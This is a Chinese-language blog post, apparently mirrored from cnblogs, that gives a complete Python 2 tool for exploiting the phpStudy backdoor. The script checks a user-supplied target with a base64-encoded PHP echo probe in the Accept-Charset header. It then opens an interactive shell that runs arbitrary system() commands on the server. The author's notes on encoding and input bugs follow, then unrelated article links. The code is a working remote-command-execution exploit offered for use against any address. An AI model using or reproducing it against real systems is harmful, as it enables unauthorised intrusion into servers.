zoukankan      html  css  js  c++  java

  • phpstudy后门交互式shell

     1 #coding=utf-8
 2 
 3 import re
 4 import base64
 5 import requests
 6 import sys
 7 reload(sys)
 8 sys.setdefaultencoding("utf-8")
 9 
10 def shell(url):
11     """
12     实现交互式shell
13     """
14     payload = raw_input("$ ")
15     payload = ' echo system(" ' + str(payload) + '");'
16     payload = base64.b64encode(payload)
17     
18     headers={
19     'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0',
20     'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
21     'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
22     'Accept-Encoding': 'gzip,deflate',
23     'Accept-Charset':payload,
24     'Connection': 'close',
25     'Upgrade-Insecure-Requests': '1',
26     'Cache-Control': 'max-age=0',
27     }
28     
29     r=requests.get(url,headers=headers,verify=False,timeout=10)
30     
31     print r.content
32     
33     shell(url)
34 
35 
36 
37 def detect(url):
38     """
39     判断是否有echo输入的字段来检测是否存在漏洞
40     """
41     headers={
42     'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0',
43     'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
44     'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
45     'Accept-Encoding': 'gzip,deflate',
46     'Accept-Charset':'ZWNobyAiZjFhZyI7',#echo "f1ag";
47     'Connection': 'close',
48     'Upgrade-Insecure-Requests': '1',
49     'Cache-Control': 'max-age=0',
50     }
51     try:
52         r=requests.get(url,headers=headers,verify=False,timeout=10)
53         #print r.text
54     except:
55         return False
56     flag = re.findall('f1ag',r.text)
57     #print flag
58 
59     if len(flag)==0:
60         return False
61     else:
62         return True
63 
64 def main():
65     url = raw_input("Please input the target address:")
66     print '[+]detecting......'
67     if detect(url)==True:
68         print '[+]Connect successfully!'
69         print '[+]The shell is establishing......'
70         shell(url)
71     else:
72         print '[+] The target is not vulnerable!'
73     
74 
75 
76 if __name__ == '__main__':
77     main()

    出现问题:

    1、编码,使用r.text会打印出乱码,r.content在这里是正确的,之后需要专门学习一下编码

    2、所有输入不要使用input,应该使用raw_input,可以避免很多错误,例如不需要对输入的字符串加引号

    3、还未完善,会顺带打印出原网页内容

    截图:

     
  • 相关阅读:
    Appium+python自动化17-启动iOS模拟器APP源码案例
    Pycharm上python和unittest两种姿势傻傻分不清楚
    jenkins显示html样式问题的几种解决方案总结
    Appium+python自动化16-appium1.6在mac上环境搭建启动ios模拟器上Safari浏览器
    selenium+python在mac环境上的搭建
    python+requests接口自动化完整项目设计源码
    Appium+python自动化15-在Mac上环境搭建
    git使用教程2-更新github上代码
    git使用教程1-本地代码上传到github
    针对初学者的A*算法入门详解(附带Java源码)
  • 原文地址:https://www.cnblogs.com/Aiden-/p/12295016.html
Copyright © 2011-2022 走看看